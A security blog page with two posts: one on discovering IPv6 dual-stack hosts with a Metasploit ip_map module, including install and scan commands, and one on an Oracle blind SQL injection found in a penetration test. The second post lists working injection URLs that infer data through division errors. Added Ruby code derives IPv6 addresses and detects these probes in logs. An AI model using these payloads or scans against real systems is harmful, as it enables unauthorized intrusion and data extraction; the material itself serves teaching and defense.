Discovering Dual Stack Hosts with IP_MAP

IPv4 and IPv6 stacks can interoperate so that the v4 to v6 migration goes smoothly; hence IPv4 hosts may run a dual IP stack. Most firewalls with IPv6 support keep separate rule sets for IPv6 and IPv4.

Modern operating systems such as Linux have their IPv6 stack enabled by default, and many system administrators are unaware of the issues that may arise from running both stacks. A common mistake is a lack of coordination between the rule sets and access policies of the two stacks. Linux provides built-in packet filtering in kernel space, but an IPv4 ruleset defined with iptables is not applied to the IPv6 stack unless IPv6 rules are specified manually with ip6tables. The same applies at the upper ISO/OSI layers, where access policies are implemented on the application side.


IPv6 Link-Local Address

When no external source of network addressing information is available, IPv6 hosts automatically assign each of their interfaces a unique address derived from the L2 address. These addresses are valid only within a particular broadcast domain: routers will not forward datagrams using link-local addresses at all.

Link-local addresses have the prefix FE80::/64. The last 64 bits of the IPv6 address are derived from the L2 address of the related network adapter as follows:
  • 0xFF and 0xFE are inserted between the third and fourth byte of the MAC address
  • the second low-order bit of the first byte of the MAC address gets complemented
L2 address 00:22:15:eb:19:4f gets the IPv6 link-local address fe80::222:15ff:feeb:194f


Neighbor Discovery Protocol

"IPv6 nodes on the same link use Neighbor Discovery to discover each other's presence, to determine each other's link-layer addresses, to find routers and to maintain reachability information about the paths to active neighbors." (RFC 2461)

To determine the link-layer address of a neighbor, a node sends an ICMPv6 Neighbor Solicitation. The solicited node answers with an ICMPv6 Neighbor Advertisement announcing its link-layer address. As you may have guessed, the ICMPv6 Neighbor Discovery Protocol replaces ARP from IPv4.

ARP was replaced so that link-layer address resolution could be secured: the IPv6 header can carry the AH extension header to authenticate the datagram, and since ICMPv6 is encapsulated in IPv6, neighbor spoofing should be avoidable by means of AH. It sounds like a novel in a perfect world to me, but they still did it!


Solicited Node Address

In IPv4, the ARP request frame is sent to the MAC-level broadcast address, disturbing all nodes in the broadcast domain. In IPv6, instead of disturbing all IPv6 nodes on the local link, the solicited-node multicast address is used as the destination of the ICMPv6 Neighbor Solicitation message.

The solicited-node multicast address consists of the prefix FF02::1:FF00:0/104 followed by the last 24 bits of the IPv6 address being resolved. A node with link-local address FE80::20B:6AFF:FE47:194F listens for multicast traffic at the solicited-node address FF02::1:FF47:194F. Something similar happens at L2, where the Ethernet frame is sent to a multicast MAC address prefixed with 33:33.


What is ip_map?

ip_map is an auxiliary Metasploit module for enumerating dual stack hosts. It follows a two-step process:


ARP sweep
For each target host referred to by its IPv4 address, it sends an ARP request asking for the L2 address. If the host responds with an ARP reply, its L2 and L3 addresses are added to the nodes array.


ICMPv6 ND sweep
For each element of the nodes array, the L2 address component is extracted and used to derive:
  • Solicited-Node multicast L2 address
  • Solicited-Node multicast L3 address
  • Node Link-local address

An ICMPv6 Neighbor Solicitation packet is built and injected on the wire, and the module then waits for the corresponding ICMPv6 Neighbor Advertisement (if any).
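As an added example (not code from the ip_map module or Metasploit), the Ruby below derives from a MAC address the three values listed above: the modified EUI-64 link-local address, the solicited-node multicast address and its 33:33 Ethernet mapping. The function names are my own; the sample MAC and addresses are the ones quoted earlier on this page.

```ruby
require 'ipaddr'

# Modified EUI-64 as described above: insert ff:fe between the third and fourth
# byte of the MAC and complement the second low-order bit of the first byte.
def mac_to_link_local(mac)
  bytes = mac.split(':').map { |h| Integer(h, 16) }
  raise ArgumentError, "bad MAC #{mac.inspect}" unless bytes.size == 6 && bytes.all? { |b| b.between?(0, 255) }
  eui = bytes[0, 3] + [0xff, 0xfe] + bytes[3, 3]
  eui[0] ^= 0x02
  iid = eui.each_slice(2).map { |hi, lo| ((hi << 8) | lo).to_s(16) }.join(':')
  IPAddr.new("fe80::#{iid}").to_s # IPAddr#to_s returns the compressed form
end

# Solicited-node multicast address: prefix ff02::1:ff00:0/104 plus the low 24 bits of the target.
def solicited_node_address(ipv6)
  addr = IPAddr.new(ipv6.downcase)
  raise ArgumentError, "not an IPv6 address: #{ipv6}" unless addr.ipv6?
  low24 = addr.to_i & 0xffffff
  IPAddr.new(format('ff02::1:ff%02x:%04x', low24 >> 16, low24 & 0xffff)).to_s
end

# Ethernet mapping of an IPv6 multicast address: 33:33 followed by its low 32 bits.
def multicast_mac(ipv6_multicast)
  low32 = IPAddr.new(ipv6_multicast.downcase).to_i & 0xffffffff
  ([0x33, 0x33] + [low32].pack('N').bytes).map { |b| format('%02x', b) }.join(':')
end

# The three values the ND sweep derives from each ARP-discovered node's MAC
# before building its Neighbor Solicitation (function name is mine, not the module's).
def nd_targets(mac)
  link_local = mac_to_link_local(mac)
  sn = solicited_node_address(link_local)
  { link_local: link_local, solicited_node: sn, solicited_node_mac: multicast_mac(sn) }
end

p nd_targets('00:22:15:eb:19:4f') if __FILE__ == $PROGRAM_NAME
```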


How to ip_map?

Download the msf trunk
svn co http://www.metasploit.com/svn/framework3/trunk /framework

Download and install pcaprub from RubyForge
svn co http://pcaprub.rubyforge.org/svn pcaprub
cd pcaprub
ruby extconf.rb && make && sudo make install

Download and install racket (1.0.7 at the moment of writing)
sudo gem install --source http://spoofed.org/files/racket racket

Create the resource file ndpsweep.msf for msf:
use auxiliary/scanner/discovery/ip_map
setg INTERFACE eth0
setg SHOST 192.168.2.100
setg SMAC 00:21:5d:61:7f:c0
setg RHOSTS 192.168.2.0/24
run
exit

Download and install ip_map
svn co http://msf-hack.googlecode.com/svn/trunk
cp ip_map.rb /framework/modules/auxiliary/scanner/discovery/

Start the msf framework with the resource file created above
sudo MSF_LOCAL_LIB=/var/lib/gems/1.8/gems/racket-1.0.7 ./msfconsole -r ./ndpsweep.msf




Blind SQL Injection: Inference through Underflow Error

About one year ago I was hired to perform a WAPT against a web portal. There was an eShop portlet composed of many servlets, one of which was used to obtain a discount by supplying a valid promotion code. That servlet returned a response page containing one of two different messages when an invalid promotion code was submitted:

  • Not a valid promotion code

  • Error occurred please try later


The second message was returned when the supplied code contained evil characters, such as a single quote, that probably raised an error on the backend DBMS. Unfortunately there was a proper error-handling policy catching the exception and keeping the code backtrace off the response page. It looked like the servlet was vulnerable to blind SQL injection.

Recalling my contributions to the OWASP Backend Security Project, I used some techniques I had previously developed to fingerprint a DBMS by injecting statements that rely on string concatenation and SQL dialect.

After deep fuzzing and response body analysis I found that Not a valid promotion code was triggered by the following URLs:

/codeValidator.jsp?code=wrong
/codeValidator.jsp?code=wr' || 'ong
/codeValidator.jsp?code=wr' || (SELECT 'o' FROM DUAL) || 'ng
/codeValidator.jsp?code=wr' || (SELECT SUBSTR('oo', 1, 1) FROM DUAL) || 'ng


Error occurred please try later was triggered by the following URLs:

/codeValidator.jsp?code=wrong'
/codeValidator.jsp?code=wr'ng
/codeValidator.jsp?code=wr' || (SELECT 1/0 FROM DUAL) || 'ng

Both sets confirmed a SQL injection vulnerability and gave away Oracle as the backend DBMS. Unfortunately, I didn't have a valid promotion code, so what kind of tautology was I supposed to use?

The answer I found was:

  • Raise an underflow exception if and only if the tautology is FALSE

  • Analyze which message is returned to determine whether the underflow exception occurs



To this end I set up an inference procedure using the PL/SQL function INSTR. INSTR returns the index of the first occurrence of a character in a string if the string contains that character, and 0 otherwise. This means INSTR behaves as follows when combined with SUBSTR and a 1/x expression:


SELECT 1/INSTR(SUBSTR('daniele',1,1), 'd') FROM DUAL => 1
SELECT 1/INSTR(SUBSTR('daniele',1,1), 'z') FROM DUAL => Underflow Exception


From this it was easy to derive the inference procedure. These query strings returned Not a valid promotion code:


?code=test' || (SELECT 1/INSTR(SUBSTR(version,1,1),'9') FROM v$instance) || '
?code=test' || (SELECT 1/INSTR(SUBSTR(version,2,1),'.') FROM v$instance) || '
?code=test' || (SELECT 1/INSTR(SUBSTR(version,3,1),'2') FROM v$instance) || '
?code=test' || (SELECT 1/INSTR(SUBSTR(version,4,1),'.') FROM v$instance) || '
?code=test' || (SELECT 1/INSTR(SUBSTR(version,5,1),'0') FROM v$instance) || '
?code=test' || (SELECT 1/INSTR(SUBSTR(version,6,1),'.') FROM v$instance) || '
?code=test' || (SELECT 1/INSTR(SUBSTR(version,7,1),'8') FROM v$instance) || '
?code=test' || (SELECT 1/INSTR(SUBSTR(version,8,1),'.') FROM v$instance) || '
?code=test' || (SELECT 1/INSTR(SUBSTR(version,9,1),'0') FROM v$instance) || '


While these query strings returned Error occurred please try later:

?code=wrong' || (SELECT 1/INSTR(SUBSTR(version,1,1),'8') FROM v$instance) || '
?code=wrong' || (SELECT 1/INSTR(SUBSTR(version,2,1),',') FROM v$instance) || '
?code=wrong' || (SELECT 1/INSTR(SUBSTR(version,3,1),'3') FROM v$instance) || '
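As an added illustration from the defender's side (not part of the original post), the Ruby below decodes the code parameter from constructed access-log lines shaped like the probes above and flags the building blocks of this inference technique: Oracle string concatenation, inline subqueries, the 1/0 or 1/INSTR(...) division oracle, and references to DUAL or v$instance. The log lines, IP addresses and the SUMMER10 promotion code are constructed sample data, and the function names are my own.

```ruby
require 'cgi'

# Constructed access-log lines (not from the post's engagement): two benign lookups
# followed by the probe shapes discussed above, URL-encoded as a browser would send them.
SAMPLE_LOG = <<~LOG
  10.0.0.5 - - [01/Jan/2010:10:00:01 +0000] "GET /codeValidator.jsp?code=SUMMER10 HTTP/1.1" 200 512
  10.0.0.5 - - [01/Jan/2010:10:00:02 +0000] "GET /codeValidator.jsp?code=wrong HTTP/1.1" 200 612
  10.0.0.9 - - [01/Jan/2010:10:00:03 +0000] "GET /codeValidator.jsp?code=wrong' HTTP/1.1" 200 580
  10.0.0.9 - - [01/Jan/2010:10:00:04 +0000] "GET /codeValidator.jsp?code=wr'%20||%20'ong HTTP/1.1" 200 612
  10.0.0.9 - - [01/Jan/2010:10:00:05 +0000] "GET /codeValidator.jsp?code=test'%20||%20(SELECT%201/INSTR(SUBSTR(version,1,1),'9')%20FROM%20v$instance)%20||%20' HTTP/1.1" 200 612
LOG

# Each indicator is one building block of the probes above; they are matched on the decoded value.
INDICATORS = {
  sql_concat:   /\|\|/,                           # Oracle string concatenation operator
  subselect:    /\(\s*SELECT\b/i,                 # inline subquery
  error_oracle: %r{\b1\s*/\s*(0\b|INSTR\s*\()}i,  # 1/0 or 1/INSTR(...) division-by-zero oracle
  oracle_src:   /\bFROM\s+(DUAL|v\$instance)\b/i  # Oracle-specific row sources
}.freeze

REQUEST_RE = /^(\S+) \S+ \S+ \[[^\]]+\] "GET (\S+) HTTP/

# Decode one log line and list which indicators its "code" parameter triggers.
def analyze_line(line)
  m = REQUEST_RE.match(line) or return nil
  ip, target = m[1], m[2]
  query = target.split('?', 2)[1].to_s
  code = CGI.parse(query).fetch('code', []).first.to_s  # CGI.parse percent-decodes the value
  hits = INDICATORS.select { |_, re| code.match?(re) }.keys
  hits << :unbalanced_quote if code.count("'").odd?     # a lone quote is the classic first probe
  { ip: ip, code: code, indicators: hits, suspicious: !hits.empty? }
end

def analyze_log(text)
  text.each_line.map { |l| analyze_line(l) }.compact
end

# Source IPs that sent at least one suspicious request, with every indicator seen from them.
def suspicious_sources(text)
  analyze_log(text).select { |r| r[:suspicious] }
                   .group_by { |r| r[:ip] }
                   .transform_values { |rs| rs.flat_map { |r| r[:indicators] }.uniq }
end

p suspicious_sources(SAMPLE_LOG) if __FILE__ == $PROGRAM_NAME
```

The durable fix is to bind the promotion code as a query parameter instead of concatenating it into the statement; log detection like this is a compensating control and a way to recognise the probing pattern after the fact.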